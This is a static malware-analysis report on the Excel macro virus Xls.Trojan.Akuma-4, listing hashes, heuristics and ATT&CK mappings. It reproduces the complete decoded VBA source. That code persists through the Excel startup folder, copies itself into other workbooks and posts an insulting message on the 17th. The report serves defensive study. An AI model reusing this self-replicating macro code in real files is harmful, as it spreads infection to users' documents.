Xls.Trojan.Akuma-4 — Office (OLE) malware analysis

Static analysis result for SHA-256 802b7048f4d71b80…

MALICIOUS

Office (OLE)

Size: 269.0 KB
Created: 1999-02-08 09:24:15
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: ed233d6b6a6c33ac94f75717eedc28f0
SHA-1: 97514399f2989551a12bcc3956ce39c72e9927e1
SHA-256: 802b7048f4d71b80000798a493bbb2af4fc46e011ee4b2cc6c2149f1d330558f
Risk Score: 280

Malware Insights

Xls.Trojan.Akuma-4 · confidence 95%

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic

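This Excel 5 macro virus, identified by ClamAV as Xls.Trojan.Akuma-4, uses an Auto_Open macro to execute its payload. Auto_Open registers the Akuma routine as the sheet-activation handler (Application.OnSheetActivate). That routine saves a copy of the infected sheet as 'Akuma.XLS' in the Excel startup path, so the macro is loaded again each time Excel starts, and copies the 'Akuma' sheet into the active workbook if it is not already there. On the 17th day of the month it calls AkumaDestroy, which writes a taunting message into a worksheet or shows it in a message box. The 'SE_PASSWORD_ARCHIVE_LURE' heuristic indicates a common tactic of instructing users to decrypt or open a password-protected archive, which is often used to bypass gateway security.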

Heuristics 5

  • ClamAV: Xls.Trojan.Akuma-4 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Trojan.Akuma-4
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster (critical, OLE_XLS5_LAROUX_MACRO_VIRUS)
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • Password-protected archive handoff (high, SE_PASSWORD_ARCHIVE_LURE)
    Document gives password instructions for an archive or attachment, often used to keep payloads encrypted until after gateway scanning
  • VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Auto_Open macro (high, OLE_VBA_AUTO)
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2783 bytes
SHA-256: 588c499c68ac9a9d399df619cd09e1eeb30a2643be23c25e3c675f80ee5a5fb7
Detection: ClamAV: Xls.Trojan.Akuma-4
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script)

Attribute VB_Name = "Akuma"

Private Sub Auto_Open()
    With Application
        .DisplayRecentFiles = True
        .SheetsInNewWorkbook = 128
    End With
    Application.OnSheetActivate = "Akuma.Akuma"
End Sub

Private Sub Akuma()
    e = False
    m = False
    If Dir(Application.StartupPath & "\" & "Akuma.XLS") = "Akuma.XLS" Then e = True
    For c = 1 To ActiveWorkbook.Sheets.Count
        If ActiveWorkbook.Sheets(c).Name = "Akuma" Then m = True: Exit For
    Next c
    If e = False Then AkumaExcel
    If m = False Then AkumaModule
    Application.OnSheetActivate = "Akuma.xls!Akuma.Akuma"
    If Day(Date) = 17 Then AkumaDestroy
End Sub

Private Sub AkumaExcel()
    On Error GoTo OutExcel
    Application.ScreenUpdating = False
    actn$ = ActiveWorkbook.Name
    Workbooks(actn$).Sheets("Akuma").Copy
    nn$ = ActiveWorkbook.Name
    cdir$ = CurDir()
    ChDir Application.StartupPath
    ActiveWindow.Visible = False
    Workbooks(nn$).SaveAs FileName:=Application.StartupPath & "/" & "Akuma.XLS", FileFormat:=xlNormal, Password:="", WriteResPassword:="", ReadOnlyRecommended:=False, CreateBackup:=False
    ChDir cdir$
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "Akuma.xls!Akuma.Akuma"
OutExcel:
    On Error GoTo 0
End Sub

Private Sub AkumaModule()
    On Error GoTo OutModule
    Application.ScreenUpdating = False
    actn$ = ActiveWorkbook.Name
    Workbooks("Akuma.xls").Sheets("Akuma").Copy before:=Workbooks(actn$).Sheets(1)
    Workbooks(actn$).Save
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "Akuma.xls!Akuma.Akuma"
OutModule:
    On Error GoTo 0
End Sub

Private Sub AkumaDestroy()
    If Dir("c:\mary.log", vbArchive + vbHidden + vbReadOnly) = "" Then
        For c = 1 To ActiveWorkbook.Sheets.Count
            If ActiveWorkbook.Sheets(c).Name <> "Akuma" Then copier = c: Exit For
        Next c
        ActiveWorkbook.Sheets(copier).Select
        ActiveWorkbook.Sheets(copier).Visible = True
        Cells(1, 1) = "Something wonderful has happened, your PC is alive and even better but some of your documents are infected by the Akuma virus."
        Cells(2, 1) = "Minny is simply a bitch and you, " + Application.UserName + ", are a stupid jerk."
        Cells(3, 1) = "Have a nice day."
        ActiveWorkbook.Sheets(copier).Visible = False
    Else
        MsgBox "Something wonderful has happened, your PC is alive and even better but some of your documents are infected by the Akuma virus." + Chr$(10) + "Minny is simply a bitch and you, " + Application.UserName + ", are a stupid jerk." + Chr$(10) + "Have a nice day."
    End If
End Sub